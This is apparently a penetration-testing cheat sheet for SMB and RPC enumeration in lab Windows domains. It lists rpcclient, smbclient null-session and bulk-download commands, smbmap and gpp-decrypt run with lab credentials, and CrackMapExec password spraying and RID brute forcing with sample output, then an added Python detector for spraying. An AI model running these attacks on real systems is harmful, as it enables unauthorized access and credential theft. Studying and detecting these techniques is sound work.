SMB & RPC Enumeration

enum4linux

enum4linux IP

rpcclient

rpcclient -U '' 10.129.229.11

rpcclient> enumdomusers

Press Tab twice at the rpcclient> prompt to list the available commands.

rpcclient> querydispinfo

smbclient

Null session

smbclient //10.129.230.0/support-tools -N
smbclient -L //IP -U '' -N

Connect to a share

smbclient //IP/IPC$

Connect and download recursively all resources

smbclient //10.129.229.121/Replication

smb: \> recurse on
smb: \> prompt off
smb: \> mget *

SMB Null session

smbclient -L //IP -U '' -N

smbmap

smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.129.229.121 

Group Policy Preferences (GPP)

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ  

CrackMapExec smb

Determine Password Policy

crackmapexec smb 10.129.228.111 --pass-pol

Test username and password lists (sample output)

crackmapexec smb 10.129.96.157 -u ./users.txt -p ./passwords.txt
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 

SID bruteforcing

crackmapexec smb 10.129.96.157 -u hazard -p stealth1agent --rid-brute

Password bruteforce

Users / Users

First, try every username in the list as a password for every user (all combinations).

crackmapexec smb 10.129.228.111 -u ./users.txt -p ./users.txt  --continue-on-success

Users / Username (1)

Try each username as its own password (only one attempt per user).

crackmapexec smb 10.10.85.7 -u ./users.uniq -p ./users.uniq --continue-on-success --no-bruteforce 

Users with empty password

Try each user with an empty password.

crackmapexec smb 10.10.85.7 -u ./users.uniq -p '' --continue-on-success --no-bruteforce
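
Detection side of the one-attempt-per-user runs above, as an added example (not part of the original page): each account sees a single failure, so per-account lockout counters stay quiet and the signal is one source failing against many distinct accounts. The CSV layout, the IP addresses, most account names and the thresholds are constructed assumptions; 4625 and 4624 are the Windows Security event IDs for failed and successful logons.

```python
import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

# Constructed sample export: time, event ID, source IP, target account.
# 4625 = failed logon, 4624 = successful logon (Windows Security log).
SAMPLE = """\
2024-05-01T10:00:01,4625,10.10.14.5,admin
2024-05-01T10:00:02,4625,10.10.14.5,alice
2024-05-01T10:00:03,4625,10.10.14.5,bob
2024-05-01T10:00:04,4625,10.10.14.5,carol
2024-05-01T10:00:05,4624,10.10.14.5,hazard
2024-05-01T10:03:00,4625,10.10.20.9,dave
2024-05-01T10:03:20,4625,10.10.20.9,dave
2024-05-01T10:03:40,4625,10.10.20.9,dave
2024-05-01T11:30:00,4625,10.10.20.9,erin
"""

def find_sprays(text, window=timedelta(minutes=5), min_users=4):
    """Return {source_ip: {"failed": set, "succeeded": set}} for sources that
    fail logons against >= min_users distinct accounts inside one window."""
    by_src = defaultdict(list)
    for row in csv.reader(StringIO(text)):
        if len(row) == 4:  # skip blank or malformed lines
            ts, event_id, src, user = row
            by_src[src].append((datetime.fromisoformat(ts), event_id, user.lower()))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the left edge until the span fits inside `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            chunk = events[start:end + 1]
            failed = {u for _, eid, u in chunk if eid == "4625"}
            if len(failed) >= min_users:
                # Successes from the same source are the accounts to triage first.
                hit = alerts.setdefault(src, {"failed": set(), "succeeded": set()})
                hit["failed"] |= failed
                hit["succeeded"] |= {u for _, eid, u in chunk if eid == "4624"}
    return alerts

if __name__ == "__main__":
    print(find_sprays(SAMPLE))
```

The repeated failures against a single account from 10.10.20.9 are left to the normal lockout policy and are not reported here.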


Last updated 1 year ago


Reference: Enumerate users by bruteforcing RID (CrackMapExec ~ CME WIKI)